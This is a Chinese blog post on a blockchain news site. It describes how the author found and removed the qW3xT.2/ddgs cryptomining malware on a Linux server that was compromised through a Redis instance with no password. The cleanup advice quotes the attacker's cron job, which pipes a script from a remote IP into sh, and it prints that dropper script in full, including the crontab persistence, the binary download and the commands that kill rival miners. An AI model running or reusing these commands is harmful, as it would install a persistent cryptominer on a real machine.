找回密码
 立即注册
  • QQ空间
  • 回复
  • 收藏

Linux 下qW3xT.2,解决挖矿病毒

币看世界| 2018-10-12 00:16 阅读 954 评论 1

早上开启电脑,连接服务器,使用top查看cpu状态。结果显示进程占用cpu99%以上。

Linux 下qW3xT.2,解决挖矿病毒


在网上百度,了解到qW3xT.2是一个挖矿病毒。也就是说别人利用你的电脑挖矿。谋取利益。

解决办法:

1、首先解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis

2、进入/tmp文件夹下。发现qW3xT.2文件,删除。之后kill掉qW3xT.2该进程,但是一段时间之后,发现该行程又重新启动。

肯定是有守护进程,观察top命令下的进程,发现一个可疑的进行

Linux 下qW3xT.2,解决挖矿病毒


3、在/tmp文件夹下发现该进程的文件 ls /tmp

发现qW3xT.2文件又重新生成了。这时,首先删除qW3xT.2文件和ddgs.3013文件,然后使用top查询qW3xT.2和ddgs.3013的pid,直接kill掉。

4、一段时间之后,删除的文件重新生成,dds和挖矿的进程又重新执行。此时怀疑是否有计划任务,此时查看计划任务的列表
[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -l*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -r //删除计划任务

curl 的这几个 optional 介绍,我也是百度的

-f - fail在HTTP错误(H)上静默失败(根本没有输出)

-s -silent静音模式。 不要输出任何东西

–socks4 HOST [:PORT]给定主机+端口上的SOCKS4代理

–socks4a HOST [:PORT]给定主机+端口上的SOCKS4a代理

–socks5 HOST [:PORT]给定主机+端口上的SOCKS5代理

–socks5-hostname HOST [:PORT] SOCKS5代理,将主机名传递给代理

–socks5-gssapi-service名称为gssapi的SOCKS5代理服务名称

–socks5-gssapi-nec与NEC SOCKS5服务器的兼容性

-S –show-error显示错误。 使用-s时,make curl会在出现错误时显示错误

-L –location遵循重定向(H)

–location-trusted like –location并将auth发送给其他主机(H)

此时计划任务已经删除。详细信息查看https://juejin.im/post/5b62b975f265da0f9628a820。

计划任务删除完成之后,这个13又开始运行。太顽固了。

于是我又看计划任务的内容,是否是有东西没有删除干净。
[root@FantJ tmp]# curl -fsSL http://149.56.106.215:8000/i.shexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "" > /var/spool/cron/rootecho "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/rootmkdir -p /var/spool/cron/crontabsecho "" > /var/spool/cron/crontabs/rootecho "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/rootps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013if [ ! -f "/tmp/ddgs.3013" ]; then curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013fichmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs killps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs killps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs killps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs killps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs killps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill发现计划任务在服务器中创建了几个文件,/var/spool/cron/crontabs/root/var/spool/cron/root内容是*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。(与计划任务相同)将计划任务中创建的文件删除。

最终,这个挖矿病毒终于删除完成

本文仅代表作者个人观点,不代表巨推链平台发声,对文章观点有疑义请先联系作者本人进行修改,若内容非法请联系平台管理员,邮箱cxb5918@163.com。更多区块链资讯,请到百万区块链发烧友聚集平台巨推链www.jutuilian.com学习区块链技术请到巨推学院www.jutuiedu.com
  • 卜静 2018-10-12 00:23
    我也遇到过,跟你的情况类似[捂脸]
文章点评
2018-10-21 12:19
业界 比特大陆熊市抢滩港交所,剑指何方?
在比特大陆宣布计划在2018年在香港交易所挂牌上市后,关注全球币链圈发展的市场人士纷 <详情>
2018-10-21 11:53
数字币 阿拉伯联合酋长国允许ICO作为企业融资选择
阿拉伯联合酋长国(阿联酋)宣布计划推出新规则,允许初始投币(ICO)作为国内公司的 <详情>
2018-10-21 11:52
政策 国家网信办征求意见!关于区块链信息服务管理的23条规定
为了规范区块链信息服务活动,促进区块链信息服务健康有序发展,保护公民、法人和其他 <详情>
2018-10-21 11:44
数字币 「得得交易榜」VET-唯链、ETH单日跌幅超10%,交易量TOP5交易所排
据链得得App行情数据统计,截至9月12日19:30,全球交易金额最高的TOP30交易所中,BitM <详情>
2018-10-21 11:42
数字币 币本直播-为没收犯罪所得的比特币,泰国计划创建自己的加密钱包
文章来源:币本社区(bitben_com)据CCN9月3日报道,由于在没收数字资产方面存在法律 <详情>
2018-10-21 11:35
技术 算力远超谷歌与英伟达!华为发布两款AI芯片,7nm工艺+自主研发
随着数字化进程和移动互联网的蓬勃发展,AI神经网络在近几年迎来快速增长期。受限于AI <详情>
2018-10-21 11:29
创投 日本监管趋严,这些国家谁会接棒成为下一个区块链创业天堂?
听说日本加强对数字货币的监管了。加上比特币大跌、以太坊大跌......最近的各种利空消 <详情>
2018-10-21 11:24
创投 3分钟了解区块链技术投资之道
创意配图:区块链 区块链技术究竟区块链是一个使用的技术,还是一个可以用于投资的项 <详情>
2018-10-21 11:23
数字币 中国区块链的冰与火之年
京中有善口技者。会宾客大宴,于厅事之东北角,施八尺屏障,口技人坐屏障中,一桌、一 <详情>
2018-10-21 11:22
应用 区块链形态公有链、联盟链、私有链之间的异同有哪些?
公有链:任何人都能读取区块链信息,发送交易并能被确认,参与共识过程中的区块链,是 <详情>
2018-10-21 11:21
数字币 走出“伪区块链”陷阱,“新实体经济”才是区块链的终极应用!
2018年,基于区块链火爆起来的“币圈”迎来一轮大洗牌,去年的所谓“百倍币”、“千倍 <详情>
2018-10-21 11:19
应用 海南百度区块链实验室正式揭牌,将致力于建设区块链产业生态
免责声明:本文不构成任何投资建议。小编:记得关注哦!10月18日下午,海南省人民政府 <详情>
2018-10-21 11:16
+场景 知识就是金钱,区块链如何保护版权?
互联网让不少网络作家和相关参与者得到了红利,但是他们又再一次被扯进了版权保护的旋 <详情>
2018-10-21 11:13
业界 骗子冒充区块链概念式传销,18天赚8600万
如果有人告诉你,可以18天坐收8600多万,千万不要以为是致富神话。各种空手套白狼、庞 <详情>
2018-10-21 11:09
数字币 中央党校教授:官方数字货币如何破解金融困境?
火讯财经注:数字货币虽然可能挑战传统的金融体系,但也代表着货币体系的巨大创新,从 <详情>
2018-10-21 11:08
业界 「一周链圈风险回顾」数字货币失窃案中,只有20%能被追回
1.数字货币失窃案中,只有20%能被追回美国网络安全公司Ciphertrace首席执行官Jevans表 <详情>
2018-10-21 11:02
数字币 黑客借漏洞造2.35亿枚PGN
10月3日,北京链安讯,鲜为人知的数字货币鸽子币PGN(pigeoncoin)背后的开发人员近日 <详情>
2018-10-21 11:00
数字币 USDT增发伴随比特币上涨 区块链将是所有项目的基础设施
声音 | 五道口金融学院博士后吴文:USDT增发伴随比特币上涨清华大学五道口金融学院博 <详情>
2018-10-21 10:59
数字币 四大会计事务所发布虚拟币报告:30%已失去全部价值
据外媒报道,全球四大会计师事务所之一的安永事务所,近日发布了2018年虚拟货币报告, <详情>
2018-10-21 10:53
访谈 矿霸吴忌寒:挟AI芯片过凛冬
数字货币凛冬已至。比特大陆,这个注定在数字货币发展史上留下浓重一笔的矿机企业,种 <详情>